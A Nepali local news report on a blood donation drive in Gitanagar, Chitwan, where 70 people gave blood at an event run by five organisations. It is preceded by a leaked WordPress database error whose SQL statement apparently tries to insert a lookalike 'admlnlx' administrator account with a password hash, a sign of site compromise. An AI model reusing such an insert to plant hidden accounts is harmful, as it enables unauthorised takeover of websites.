WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkDqJY/9HUwn2ol3zPZNZD8lUmWohW1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 21:19:12', '', 'admlnlx', 'admlnlx')
चितवन, पुस २–
बिभिन्न ५ वटा संस्थाको आयोजनामा गीतानगरमा गरिएको रक्तदान कार्यक्रममा ७० जनाले रक्तदान गरेका छन् । अन्नपूर्ण दुग्ध उत्पादक सहकारी संस्था लिमिटेड, आकृती पाठक स्मृती प्रतिष्ठान, महिला समूह समन्वय समिति, देवनगर दुग्ध उत्पादक सहकारी संस्था लिमिटेड र लायन्स क्वल अफ भरतपुर बिसहजारीको संयुक्त आयोजनामा शनिवार भएको रक्तदान कार्यक्रम गरिएको हो ।
नेपाल रेडक्रस सोसाइटी चितवनका सभापति ज्ञानशाली न्यौपाने प्रमुख अतिथि रहेको कार्यक्रममा लायन्स क्वल ३२५ वी २ का डिष्ट्रिक गर्भनर घनश्याम भट्टराई विशिष्टि अतिथी रहनुभएको थियो । कार्यक्रममा अन्नपूर्ण दुग्ध उत्पादक सहकारी संस्थाका अध्यक्ष भागिरथ तिमिल्सिना, आकृती पाठक स्मृती प्रतिष्ठानका अध्यक्ष लोकराज पौडेल, देवनगर दुग्धउत्पादक सहकारी संस्थाका अध्यक्ष रत्नमणि न्यौपाने लगायतले बोल्नुभएको थियो ।